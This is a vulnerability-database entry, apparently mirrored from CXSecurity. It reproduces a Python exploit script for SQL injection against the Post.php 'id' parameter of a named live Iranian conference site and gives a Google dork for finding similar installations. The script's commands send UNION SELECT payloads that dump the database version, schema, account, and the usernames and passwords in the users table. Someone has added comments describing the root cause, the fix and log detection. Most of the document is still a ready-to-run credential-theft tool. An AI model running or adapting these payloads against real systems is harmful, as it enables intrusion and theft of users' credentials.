Zaheb.ir | SQL Injection - CXSecurity.com

漏洞ID 1705105 漏洞类型
发布时间 2019-08-17 更新时间 2019-08-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080063
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/python3
################################################
# Title: Zaheb.ir | SQL Injection
# Date: 2019-07-23                                     
# Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس)                                     
# Exploit Author: D3trct0r
# Vendor Homepage: http://asanhamayesh.com     
# Tested on: GNU/Linux , Windows , FreeBsd , Android   
# CWE : CWE-89      
################################################


import requests
from bs4 import BeautifulSoup
# Interactive console that sends one of six fixed UNION SELECT strings in the
# `id` query parameter of a hard-coded Post.php URL and prints whatever the
# response renders inside the first <div class="post-short">.
#
# Defender notes:
# - Root cause (inferred from the payloads; the server code is not shown): the
#   `id` value reaches a SQL statement without parameter binding or integer
#   validation. The fix is a prepared statement or a strict integer cast.
# - The credential branches read `UserName` / `PassWord` columns from `users`.
#   Whether those values are hashed cannot be told from here; stored
#   credentials should be salted hashes, and exposed ones rotated.
# - Detection: every request is a GET carrying `union+select` and a negative
#   `id`, so it is visible in web-server access logs; `group_concat` and
#   `unhex(hex(` appear in the credential branches.
try:
    print ('''\033[31m
        ███████╗ █████╗ ██╗  ██╗███████╗██████╗    ██╗██████╗ 
        ╚══███╔╝██╔══██╗██║  ██║██╔════╝██╔══██╗   ██║██╔══██╗
          ███╔╝ ███████║███████║█████╗  ██████╔╝   ██║██████╔╝
         ███╔╝  ██╔══██║██╔══██║██╔══╝  ██╔══██╗   ██║██╔══██╗
        ███████╗██║  ██║██║  ██║███████╗██████╔╝██╗██║██║  ██║
        ╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝╚═╝  ╚═╝
                                                      
        ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗ 
        ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝ 
        █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║    
        ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║    
        ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║    
        ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝    
                                                     
        Enter 'help' to show commands
    ''')
    # Command loop: read one command per iteration and dispatch on its exact
    # text. Only `exit` leaves the loop.
    while True:
        opt = input ("[root@Zaheb Exploit]# ")
        if opt == 'help' :
            # List the accepted commands; no request is sent.
            print ('''
            version
            database
            userdb
            usernames
            passwords
            userpass
            exit
            ''')
        # The six request branches below are identical except for the
        # expression in position 4 of the 19-column UNION SELECT -- presumably
        # the column the page renders into div.post-short (not confirmable
        # from this file).
        elif opt == 'version':

            # Position 4 = version(): the database server version string.
            payload = "+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            # data[0] assumes at least one matching div; an empty result
            # raises IndexError, which nothing in this script handles.
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'database':

            # Position 4 = database(): the current schema name.
            payload = "+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'userdb':
            # Position 4 = user(): the account the application connects as.
            # A least-privileged application account limits what a flaw of
            # this kind can read.
            payload = "+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'usernames':
            # Position 4 aggregates the UserName column of `users` into one
            # value with group_concat.
            payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'passwords':
            # Position 4 aggregates the PassWord column of `users`.
            payload = "+union+select+1,2,3,unhex(hex(group_concat(PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'userpass':
            # Position 4 aggregates UserName and PassWord joined by 0x3a (':').
            payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName,0x3a,PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'exit':
            quit()
        else:
            print ("EXP:",opt,"Command Not Found")
# Only SystemError is caught here. Connection failures from requests are
# raised as other exception types, so despite its message this handler does
# not cover network errors.
except SystemError:
    print ("Please Check Internet....")